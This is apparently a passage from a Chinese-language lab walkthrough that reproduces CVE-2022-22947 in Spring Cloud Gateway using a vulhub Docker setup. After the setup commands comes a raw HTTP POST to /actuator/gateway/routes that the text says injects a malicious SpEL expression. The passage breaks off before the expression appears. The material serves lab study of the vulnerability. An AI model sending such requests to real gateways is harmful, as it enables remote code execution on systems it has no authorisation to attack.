环境搭建
cd vulhub/spring/CVE-2022-22947
docker-compose up -d
服务启动后,访问http://ip:8080即可看到演示页面
漏洞复现
burp发送数据包添加一个包含恶意SpEL表达式的路由
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.41.130:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
If-None-Match: "3147526947+ident"
Content-Type: application/json
Content-Length: 333
{
"id": "hacktest",
"filters": [{
"nam